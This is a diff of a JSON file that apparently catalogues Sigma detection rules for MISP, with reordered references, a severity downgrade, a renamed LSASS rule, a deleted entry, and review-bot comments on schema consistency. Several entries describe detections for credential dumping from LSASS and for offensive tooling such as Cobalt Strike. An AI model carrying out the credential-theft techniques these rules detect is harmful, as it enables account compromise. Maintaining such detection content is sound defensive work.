- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml"
],
@@ -2700,9 +2700,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
"https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml"
],
@@ -2761,9 +2761,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml"
],
@@ -2787,8 +2787,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml"
@@ -2823,10 +2823,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
+ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml"
],
"tags": [
@@ -2849,9 +2849,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml"
],
@@ -2876,8 +2876,8 @@
"logsource.category": "application",
"logsource.product": "velocity",
"refs": [
- "https://antgarsil.github.io/posts/velocity/",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://antgarsil.github.io/posts/velocity/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml"
],
"tags": [
@@ -2931,7 +2931,7 @@
"value": "Potential Credential Dumping Attempt Via PowerShell"
},
{
- "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder",
+ "description": "Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2021/11/27",
@@ -2939,15 +2939,15 @@
"Updaters and installers are typical false positives. Apply custom filters depending on your environment"
],
"filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml"
],
"tags": [
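Review bot: the `level` downgrade from high to medium in this hunk is a real severity change for anyone mapping sigma-rules galaxy levels to alert priority, and it lands in the same hunk as a refs reorder, so it is easy to miss; call the downgrade out in the commit message. The two refs moved to the top (the Microsoft process security and access rights page and the FIRST 2017 Sysmon slides) are the same URLs as before, so there is no content change in the `refs` list itself.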
@@ -2966,7 +2966,7 @@
}
],
"uuid": "fa34b441-961a-42fa-a100-ecc28c886725",
- "value": "LSASS Access from Program in Suspicious Folder"
+ "value": "LSASS Access From Program in Potentially Suspicious Folder"
},
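Review bot: renaming `value` from "LSASS Access from Program in Suspicious Folder" to "LSASS Access From Program in Potentially Suspicious Folder" is a breaking change for anyone tagging by name: MISP galaxy tags are built from the `value` string, so events tagged with the old name no longer match this cluster even though the uuid fa34b441-961a-42fa-a100-ecc28c886725 is unchanged. Mirroring the upstream title is fine, and the description edit ("suspicious" to "potentially suspicious") is consistent with the level downgrade in the previous hunk, but the old title should be added to a `synonyms` list in `meta` (the convention this repository already uses, as in the Remcos entry above) so the old tag still resolves, or the rename should be listed in the changelog.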
{
"description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.",
@@ -2981,8 +2981,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/shantanukhande/status/1229348874298388484",
"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
+ "https://twitter.com/shantanukhande/status/1229348874298388484",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"
],
"tags": [
@@ -3128,8 +3128,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/hlldz/Invoke-Phant0m",
"https://twitter.com/timbmsft/status/900724491076214784",
+ "https://github.com/hlldz/Invoke-Phant0m",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml"
],
"tags": [
@@ -3162,9 +3162,9 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
"https://twitter.com/mrd0x/status/1460597833917251595",
+ "https://twitter.com/_xpn_/status/1491557187168178176",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml"
],
"tags": [
@@ -3419,8 +3419,8 @@
"logsource.product": "windows",
"refs": [
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md",
+ "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
"https://research.splunk.com/endpoint/windows_possible_credential_dumping/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml"
],
@@ -3455,10 +3455,10 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml"
],
"tags": [
@@ -3493,11 +3493,11 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml"
],
"tags": [
@@ -3531,11 +3531,11 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml"
],
"tags": [
@@ -3752,8 +3752,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
+ "https://twitter.com/_xpn_/status/1491557187168178176",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml"
],
"tags": [
@@ -3787,9 +3787,9 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
+ "https://github.com/codewhitesec/SysmonEnte/",
"https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html",
"https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png",
- "https://github.com/codewhitesec/SysmonEnte/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml"
],
"tags": [
@@ -3822,8 +3822,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/boku7/injectAmsiBypass",
"https://github.com/boku7/spawn",
+ "https://github.com/boku7/injectAmsiBypass",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml"
],
"tags": [
@@ -3865,8 +3865,8 @@
"logsource.category": "process_access",
"logsource.product": "windows",
"refs": [
- "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://twitter.com/SBousseaden/status/1541920424635912196",
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml"
],
@@ -3981,8 +3981,8 @@
"logsource.category": "sysmon_error",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml"
],
"tags": [
@@ -4015,8 +4015,8 @@
"logsource.category": "sysmon_status",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml"
],
"tags": [
@@ -4176,11 +4176,11 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
- "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
- "https://github.com/SigmaHQ/sigma/issues/253",
"https://twitter.com/d4rksystem/status/1357010969264873472",
+ "https://github.com/SigmaHQ/sigma/issues/253",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/",
+ "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml"
],
"tags": [
@@ -4249,8 +4249,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html",
+ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml"
],
"tags": [
@@ -4372,8 +4372,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html",
+ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml"
],
"tags": [
@@ -4406,8 +4406,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml"
],
"tags": [
@@ -4441,8 +4441,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://github.com/zcgonvh/EfsPotato",
"https://twitter.com/SBousseaden/status/1429530155291193354?s=20",
+ "https://github.com/zcgonvh/EfsPotato",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml"
],
"tags": [
@@ -4518,18 +4518,18 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
"https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
"https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://github.com/RiccardoAncarani/LiquidSnake",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
"https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://github.com/RiccardoAncarani/LiquidSnake",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml"
],
"tags": [
@@ -4563,8 +4563,8 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml"
],
"tags": [
@@ -4598,9 +4598,9 @@
"logsource.category": "pipe_created",
"logsource.product": "windows",
"refs": [
- "https://github.com/Azure/SimuLand",
- "https://o365blog.com/post/adfs/",
"https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
+ "https://o365blog.com/post/adfs/",
+ "https://github.com/Azure/SimuLand",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml"
],
"tags": [
@@ -4757,8 +4757,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)",
"https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml"
],
"tags": "No established tags"
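Review bot: `tags` is a bare string on this entry (`"tags": "No established tags"`) but an array everywhere else in the file (`"tags": [` at the end of the neighbouring hunks). A consumer that iterates `tags` will either throw or iterate over characters here. Emit an empty array for untagged rules and keep the field to one JSON type.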
@@ -4826,7 +4826,7 @@
{
"description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration",
"meta": {
- "author": "frack113, Nasreddine Bencherchali",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2023/01/17",
"falsepositive": "No established falsepositives",
"filename": "win_firewall_as_delete_all_rules.yml",
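Review bot: same type inconsistency for `falsepositive`: here it is the string `"No established falsepositives"`, while the entries deleted further down carry a list such as `"falsepositive": ["Unlikely"]`. Emit `[]` rather than a sentinel string so the field has one type; the `author` change itself in this hunk is fine.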
@@ -4845,7 +4845,7 @@
{
"description": "Detects activity when the settings of the Windows firewall have been changed",
"meta": {
- "author": "frack113",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2022/02/19",
"falsepositive": "No established falsepositives",
"filename": "win_firewall_as_setting_change.yml",
@@ -5038,8 +5038,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml"
],
"tags": [
@@ -5073,9 +5073,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
"https://twitter.com/MsftSecIntel/status/1257324139515269121",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml"
],
"tags": [
@@ -5108,8 +5108,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml"
],
"tags": [
@@ -5262,8 +5262,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml"
],
"tags": "No established tags"
@@ -5317,9 +5317,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml"
],
"tags": "No established tags"
@@ -5340,8 +5340,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml",
+ "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml"
],
"tags": [
@@ -5374,8 +5374,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml"
],
"tags": [
@@ -5485,29 +5485,6 @@
"uuid": "72124974-a68b-4366-b990-d30e0b2a190d",
"value": "Metasploit SMB Authentication"
},
- {
- "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_diagtrack_eop_default_login_username.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ]
- },
- "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196",
- "value": "DiagTrackEoP Default Login Username"
- },
{
"description": "This events that are generated when using the hacktool Ruler by Sensepost",
"meta": {
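Review bot: this hunk deletes the cluster value with uuid `2111118f-7e46-4fc8-974a-59fd8ec95196` outright instead of leaving a stub that marks it deprecated. Any MISP event already tagged `misp-galaxy:sigma-rules="DiagTrackEoP Default Login Username"` keeps a tag that no longer resolves, and the uuid cannot safely be reused. The deleted `refs` still point at `rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml`; if the upstream rule was moved or deprecated rather than removed, the generator should follow it to its new path instead of dropping the entry, and if it is really gone the value should survive with a deprecation marker. Before merging, grep the repository for the uuid to confirm nothing else references it.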
@@ -5521,10 +5498,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
- "https://github.com/sensepost/ruler",
"https://github.com/sensepost/ruler/issues/47",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
+ "https://github.com/sensepost/ruler",
"https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml"
],
@@ -5616,8 +5593,8 @@
"logsource.product": "windows",
"refs": [
"https://awakesecurity.com/blog/threat-hunting-for-paexec/",
- "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml"
],
"tags": [
@@ -5688,40 +5665,6 @@
"uuid": "32d56ea1-417f-44ff-822b-882873f5f43b",
